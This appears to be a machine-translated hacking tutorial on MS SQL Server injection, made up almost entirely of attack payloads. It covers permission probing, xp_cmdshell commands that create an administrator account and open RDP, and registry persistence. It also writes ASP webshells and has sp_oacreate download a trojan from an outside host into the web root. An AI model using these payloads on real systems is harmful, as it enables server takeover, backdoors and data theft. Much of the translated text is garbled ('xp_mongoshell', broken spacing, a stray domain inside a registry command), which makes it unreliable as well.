MsSQL Advanced Injection command Elevation of Privilege

1. collect basic information 1. injection point type judgment and exists (select * from sysobjects) 2. injection Point permission judgment and 1 = (select is_srvrolemember ('sysadmin') // determine whether it is a system administrator and 1 = (select is_srvrolemember ('db _ owner ')) // determine whether the database permission is and 1 = (select is_srvrolemember ('public') // determine whether the database permission is public. 3. obtain other information; declare @ d int // judge MsSQL supports multi-line statement query and (select count (1) from [sysobjects])> = 0 // whether subquery and user> 0 // obtain the current database username and db_name> 0 // obtain the current database name and 1 = convert (int, Db_name () or 1 = (select db_name () // The current database name and 1 = (select @ servername) // local service name and 1 = (select HAS_DBACCESS ('master') // determine whether the database has read permission 2. Use MsSQL to expand storage injection attacks 1. checks and restores extended storage to determine whether xp_mongoshell extended storage exists and 1 = (select count (*) from master. dbo. sysobjects where xtype = 'X' AND name = 'xp _ external shell ') Determine whether the xp_regread extended stored procedure exists and 1 = (select count (*) from master. dbo. sysobjects where name = 'xp _ regread ') Restore; exec sp_dropextendedproc 'Xp _ cmdshell'; exec sp_dropextendedproc xp_cmdshell, 'xp log70. dll '3. method 1 to exploit extended storage attacks under sa Permissions. run any command to View Drive C using xp_mongoshell extension; drop table black; create TABLE black (mulu varchar (7996) NULL, ID int not null identity ))--; insert into black exec master .. xp_mongoshell 'dir c: \ 'and 1 = (select top 1 mulu from black where id = 1) create a user; exec master .. xp_mongoshell 'net user test/add'; exec master .. xp_mongoshell 'net lo Calgroup administrators test/add' open 3389; exec master .. xp_cmdshell 'SC config termservice start = auto'; exec master .. xp_mongoshell 'net start termservice'; exec master .. xp_cmdshell 'reg add "HKEY_LOCAL_MACHINE \ SYSTEM \ CurrentControlSet \ Control \ Terminal Server"/v www.2cto.com fDenyTSConnections/t REG_DWORD/d 0x0/F' // allow external connections; exec master .. xp_cmdshell 'reg add "HKEY_LOCAL_MACHINE \ SYSTEM \ CurrentContr OlSet \ Control \ Terminal Server \ WinStations \ RDP-Tcp "/v PortNumber/t REG_DWORD/d 0x50/F' // you can change the port to 80, either put it at the beginning and execute 2. xp_regwrite operation registry; exec master .. xp_regwrite 'HKEY _ LOCAL_MACHINE ', 'Software \ Microsoft \ Windows \ currentversion \ run', 'black', 'reg _ SZ ', 'Net user test/add' enables sandbox mode; exec master .. xp_regwrite 'HKEY _ LOCAL_MACHINE ', 'Software \ Microsoft \ Jet \ 4.0 \ Engines', 'sandboxmode', 'reg _ dword', 1 and then use je T. oledb: select * from openrowset ('Microsoft. jet. oledb.4.0 ','; database = c: \ windows \ system32 \ ias \ dnary. mdb ', 'select shell ("net user test/add")') Note: If the injection point parameter is of the integer type, you can specify "ias. mdb "database; if it is a string character type, you can specify dnary. mdb. For windows 2000 systems, the database path should be specified as "x: \ winnt \ system32 \ ias. mdb ". 3. use sp_makewebtask to write a trojan; exec sp_makewebtask e: \ www_iis \ ytasks. asp ', 'select' % 3C % 25% 65% 76% 61% 6C % 20% 72% 65% 71% 75% 65% 73% 74% 28% 22% 63% 68% 6F % 70% 70% 65% 72% 22% 29% 3E ''' -- 4. use sp_oacreate to store remote download files (this is the principle of a vulnerability exploitation tool in ah d); DECLARE @ B varbinary (8000), @ hr int, @ http INT, @ down int exec sp_oacreate [Microsoft. XMLHTTP], @ http output EXEC @ hr = sp_oamethod @ http, [Open], null, [GET], [ http://www.test.com/muma.txt ], 0 EXEC @ hr = sp_oamethod @ http, [Send], null EXEC @ hr = sp_OAGetProperty @ http, [responseBody], @ B output EXEC @ hr = sp_oacreate [ADODB. stream], @ down output EXEC @ hr = sp_OASetProperty @ down, [Type], 1 EXEC @ hr = sp_OASetProperty @ down, [mode], 3 EXEC @ hr = sp_oamethod @ down, [Open], null EXEC @ hr = sp_oamethod @ down, [Write], null, @ B EXEC @ hr = sp_oamethod @ down, [SaveToFile], null, [e: \ www_iis \ muma. asp], 1 to download the file: http://www.test.com/muma.txt Content to e: \ www_iis \ muma. asp successfully writes a webshell. 5. sp_addlogin extends the management of database users; exec master. dbo. sp_addlogin test, password exec master. dbo. sp_addlogin test, sysadmin 6. xp_servicecontrol Management Service (not useful for self-testing) can be used to stop or activate a service. exec master .. xp_servicecontrol 'stop', 'schedule' // stop the scheduled Task Service; exec master .. xp_servicecontrol 'start', 'schedule'; exec master .. xp_servicecontrol 'start', 'server' // start server Service 7. get the current web directory; drop table black; create TABLE black (mulu varchar (7996) NULL, ID int not null identity (255) --; DECLARE @ result varchar) EXEC master. dbo. xp_regread 'HKEY _ LOCAL_MACHINE ', 'System \ ControlSet001 \ Services \ W3SVC \ Parameters \ Virtual Roots', '/', @ result output insert into black (mulu) values (@ result) -- and 1 = (select top 1 mulu from black where id = 1) 4. Exploitation of extended attacks under the dbowner permission 1. determine Database User Permissions and 1 = (select is_member ('db _ owner'); -- 2. search for the web directory; create table temp (dir nvarchar (255), depth varchar (255), files varchar (255), ID int not null identity (); -- then; insert into temp (dir, depth, files) exec master. dbo. xp_dirtree 'C: ', -- and (select dir from temp where id = 1)> 0 because you cannot obtain all directory files and folder names at a time, you need to change the ID value, list files and folders in sequence. after a trojan is written to the web directory, a Trojan can be written. alter database news set recovery full; create table test (str image) --; backup log news to disk = 'C: \ test' with init --; insert into test (str) values ('<% excute (request ("cmd") %> ')--; backup log news to disk = 'C: \ inetpub \ wwwroot \ ylarge. asp '--; alter database news RECOVERY simple The quieter you become, the more you are able to hear.